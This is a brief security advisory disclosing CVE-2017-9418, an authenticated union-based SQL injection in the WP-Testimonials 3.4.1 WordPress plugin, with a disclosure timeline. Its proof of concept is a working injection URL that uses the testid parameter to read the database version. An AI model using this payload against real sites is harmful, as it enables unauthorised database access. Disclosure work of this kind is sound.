Exploits

CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)

Identification Date: 02/06/2017
Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/

 

Description

SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter.

Proof of Concept

A Proof of Concept code is provided below.

http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment

The results of the SQL injection are being reflected in the Client’s Name input field.


 

Timeline

  • 02/06/2017 – Identification of the Vulnerability
  • 02/06/2017 – Attempt to speak with the developer
  • 02/06/2017 – Request for CVE
  • 06/06/2017 – Contact with WordPress
  • 07/06/2017 – The plug-in was removed from WordPress

 

References